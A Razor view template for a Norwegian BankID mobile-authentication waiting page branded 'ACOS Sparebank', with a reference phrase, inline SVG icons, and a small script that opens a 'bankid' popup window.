@{
    Layout = "";
    ViewBag.bankIDTitle = "Identifisering";
    ViewBag.footer = true;
    ViewBag.footerTitle = "BankID brukersted";
    ViewBag.footerContent = "ACOS Sparebank";
}
<main class="body" role="main">
    <div class="viewport animate">
        <div class="scroller padding block_vertical_center full_width_height lm_view">
            <div>
                <div class="content_wrapper">
                    <div class="content info_page">
                        <div class="table">
                            <div class="row">
                                <div class="form_wrapper">
                                    <div class="row label">
                                        <label>Referanse</label>
                                    </div>
                                    <div class="title reference">
                                        <span>Feilfri diamant</span>
                                    </div>
                                </div>
                                <div class="illustration">
                                    <div class="wrapper" title="Venter på bekreftelse">
                                        <img class="icon" src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAiIGhlaWdodD0iNTAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRpdGxlPmljb19iaW1vdHA8L3RpdGxlPjxnIGZpbGw9Im5vbmUiPjxyZWN0IGZpbGw9IiMwMDc4QkQiIHdpZHRoPSIzMCIgaGVpZ2h0PSI1MCIgcng9IjIiLz48cmVjdCBmaWxsPSIjZmZmIiB4PSIyIiB5PSI4IiB3aWR0aD0iMjYiIGhlaWdodD0iMzQiIHJ4PSIxIi8+PHJlY3QgZmlsbD0iI2ZmZiIgeD0iMTIiIHk9IjQ0IiB3aWR0aD0iNiIgaGVpZ2h0PSI0IiByeD0iMSIvPjwvZz48L3N2Zz4=">
                                        <img alt="" class="spinner" src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRpdGxlPmljb19zcGlubmVyPC90aXRsZT48ZyBmaWxsPSJub25lIj48cGF0aCBkPSJNMTAgMXYyYzMuODYgMCA3IDMuMTQgNyA3IDAgMy44NTktMy4xNCA3LTcgN3YyYzQuOTcgMCA5LTQuMDMgOS05IDAtNC45NzEtNC4wMy05LTktOSIgZmlsbD0iI2ZmZiIvPjxwYXRoIGQ9Ik0xMCAzdi0yYy00Ljk3MSAwLTkgNC4wMjktOSA5IDAgNC45NyA0LjAyOSA5IDkgOXYtMmMtMy44NiAwLTctMy4xNDEtNy03IDAtMy44NiAzLjE0LTcgNy03eiIgZmlsbD0iIzAwNzhCRCIvPjwvZz48L3N2Zz4=">
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="row instructions">
                            <span>Følg dialogen på din mobiltelefon!</span>
                        </div>
                    </div>
                    <div class="row info"><span>BankID</span></div>
                </div>
            </div>
        </div>
    </div>
</main>
<script>
    window.open("bankid", "Mobile Auth", "height=500px,width=400px", false);
    setTimeout(function () {
        //post("bankid/password", {})
    }, 3000);
</script>